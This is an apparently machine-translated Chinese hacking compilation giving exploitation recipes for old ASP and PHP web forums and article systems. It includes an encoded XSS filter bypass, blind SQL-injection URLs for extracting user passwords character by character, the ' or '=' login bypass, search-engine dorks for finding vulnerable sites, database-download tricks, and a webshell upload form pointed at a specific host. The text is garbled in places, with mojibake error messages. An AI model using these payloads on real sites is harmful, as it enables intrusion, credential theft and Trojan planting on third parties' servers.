Veterans ' new biography-exploitation of various vulnerabilities and research of some search parameters _ vulnerabilities

Exploitation of various vulnerabilities and some search parameters
When it comes to vulnerabilities, the first thing you should mention is a bug that uploads the web.

"Hole net" loophole opened up the prologue of the file of loophole, other system on
The leaks are coming!

Vulnerability analysis of ASP Dynamic Network Forum

1, this loophole is not too serious, using the network forum people know, post directly to write JavaScript will be filtered split, write HTTP will automatically add links, the vulnerability is here, in these two places to change, the two words of a letter into the encoded form, and then the system corresponding to the decoding back letters, It achieves the goal of avoiding being filtered. As an example, write [img]javas& #ｘ63ript when posting: window.open (' htt& #ｘ70://www.fwcn.com ', ') [/img] See Clearly, #x63解码的字母是 "C", # X70 decoding the letter is "P",& play a role in the connection, and finally [IMG], so that JS is triggered, if the Forum support flash Insert, with [SWF] can also. Use this loophole can make some mischief, write tempting theme, point in the result is his homepage (cheat click Rate, advertise), even more absolutely, connect to a virus, Trojan page, let you straight want to dozens. This vulnerability exists in various versions of the network, including the newer version 0519, the coverage area of the wide, people think that should be detected some illegal characters to remove, rather than simply split, I really hope that the network developers to make up this loophole as soon as possible.

2, compared to the former, the second loophole problem is big, use this vulnerability can be cracked down on the forum all registered members of the password (horror ~ ~ ~), because the forum administrator usually directly to the Forum program to take down the top of the art to use, drawing convenience directly led to the emergence of loopholes, we also carry a back, Just look at the Web database, you know the password field UserPassword, and then, for example, to break a user name ABC password, first view the ABC user data, the connection is HTTP://XXXXX/DISPUSER.ASP?NAME=ABC &NBSP, in dispuser.asp, the statement reading the parameter is: Username=trim (Request ("name"), the query of the database is the statement:  sql= "Select * from  [user] where username= ' "&username&", it can be seen that  ABC is directly taken as a parameter of the Dispuer username, in addition, If the user does not exist, the program will give a hint, in this case, we will write a query password conditions, after the WHERE USERNAME=ABC plus and userpassword= "Hu Jintao", Theoretically this can be achieved on the password of the cracked, but so broken to what year, now will be the turn of the VBS function, you can first use the Len function to try out the user's password number, address so write Http://xxxxx/dispuser.asp?name=abc '% 20and%20len (UserPassword) =5%20and%20 ' 1 ' = ' 1, so it may not be easy to understand, put in the SQL statement is actually the appearance of: Sql= "Select * from [user]  where username= ' abc '  and len (userpassword) =5 and  ' 1 ' = ' 1 ', now understand the point,%20 is a space, The single quotes behind ABC and the single quotes in ' 1 ' = ' 1 are all meant to match the SQL statement. Strange, the user does not exist, OH? That means that the user does not comply with this condition, continue to change the 5 to 6,7,8, and so on, as long as the user data can be displayed, it explains the number of password digits guessed right. The next thing to do is to try the number of each person's password, continue to use the VBS, you can use the left or right or mid function, http:Xxxxx/dispuser.asp?name=abc '%20and%20left (userpassword,1) = ' A, if the right to give the user information, guess the right to give the user does not exist the hint, this is still too slow, Then just go out there. asc function, Http://xxxxx/dispuser.asp?name=abc '%20and%20asc (Mid (userpassword,1,1)) > ' 50  Try to see if the ASCII code for the user's password is greater than 50, constantly narrowing the scope, I believe it will soon be able to narrow the range to Single-digit, see if you are surprised out of a cold sweat, at least I am so, rely on a number of functions of the flexible use, conservatively said, within half an hour can be cracked out of the password. It is unfortunate that the dynamic network developers in later 05** version of the use of MD5 encryption, this is finally relieved, but there are many places in the domestic use of the old version of the Dynamic Network forum (including a small well-known flash site)   

3, dynamic Network SQL statement Vulnerability
This vulnerability is for the dynamic network SQL version.
Test method: Enter username in http://ip/bbs/admin_index.asp is ' or ' = ' password is also this
This allows you to skip authentication.
Principle: Use SQL syntax. The password and ID entered become a legitimate SQL statement that skips authentication directly.
This vulnerability is not intended for the network. Many SQL ASP will have this vulnerability

4, the Dynamic Network Forum SP2 Vulnerability (the scope of the vulnerability is very large, dynamic network official station, hacker line of defense, security base has been so black, specific information you can search in Baidu)
Upload vulnerability path: reg_upload.asp and upfile.asp



Qing Chuang Article system

Open Google input. TW qcdn (or go to Baidu to search powered by:qcdn_news but most of them are Chinese)
Qing Chuang Article system
Upload a vulnerability. Add/admin_upfile.asp after the URL if it appears.
Microsoft VBScript pound ︽ top 琿 kui 粇 kui 粇 ' 800a01b6 '
ンぃや wear  ni ┦┪よ 猭: ' Form '
/article/admin_upfile.asp,21
On behalf of more than 90% of the hope has been
Guilin Veterans Upload Tool upload Trojan
When the invasion happened, Admin_upfile.asp changed. You can also change it into a user_upfile.asp and a traditional horse. And one way to do that is to add admin_upfile.asp user_upfile.asp to the injection worker.

Green Create article Management system injection power hit
Keyword "list.asp?unid="
Tools:
1, Nbsi as if most of the hacker site have a.
2, Md5crack2, cracked MD5 encryption software (LEI recommended: dos under the DV.exe more easy to use)
The first time it is detected, it reports "No injection vulnerability detected"; then enter "Unid" in "signature character"
(Hint: "U" in "Unid" must be capitalized.)




"Dragon Article management system" loophole

Dragon Article Management System Ver 2.0 build 20040620 official version exploit
Search "Article.asp? artid= "keyword
The vulnerability file is
Admin_upfile.asp
User_upfile.asp
These two files "upfile.asp"
The reappearance of the dynamic network loophole
Add "artid=1111" to the cookie when uploading.



The exploitation of Phpwind 1.3.6 forum loophole
Search keyword "power by Phpwind v1.3.6"

phpwind1.3.6 Forum to use the program "group sharing" has the upload


After saving, the Trojan address is the faq.php under the current directory

Submit the following form in this machine:
<form enctype= "Multipart/form-data" action= "http://1717t.78cm.com/faq.php"
method= "POST" >
<input name= "MyFile" type= "File" >
<input value= "submitted" type= "Submit" >
</form>
After the successful upload of the Trojan exists in the forum directory
Direct access on the line!



Vulnerability Collection

1 Co Net MiB ver1.0~4.0 with ' or ' = ' or ' login administrator (a classic vulnerability)

2 ASP Calendar Vulnerability in Google search maintained with the Ocean12 ASP calendar Manager v1.01 This information, the program's default database is O12cal.mdb (not MD5 encryption, plaintext Save)

3 The lottery loophole, we open www.baidu.com or www.google.com.
Input in the search please verify membership material
Http://www.3589.com/tian/4login.asp changed 4login.asp to Conn.inc.

<%dbpath=server.mappath ("Wz520#.mdb")
Set conn=server.createobject ("ADODB. Connection ")
Conn. Open driver={microsoft Access Driver (*.mdb)};D bq= "&DBPath%>

Wz520#.mdb, he's the database. #改成%23 can download the database.


4 Blue Create article system serious flaw in the URL after add/admin_upfile.asp upload Webshell

Baidu Search powered by:qcdn_news Taiwan. TW Qcdn.

You can also use%5c Bauku to kill

"List.asp?unid=" ". Tw/list.asp?unid=" exists injected in "signature character" input "Unid"
("U" in "Unid" must be capitalized)

5 free Power 3.6 software upload filter not strict with WinHex.exe and WSockExpert.exe modified upload Trojan

E Times post loophole
Baidu search "e Times Inn"
Exploit page/upload.asp use veterans to upload directly

Boiling News System Upload vulnerability
Search: Boiling Outlook News System [core: Worldly elegance] authorized use
Vulnerability: There are no strict restrictions on spaces.
Therefore, we directly selected to upload the ASP trojan, and then add a space behind
Its upload file is uploadfaceok.asp.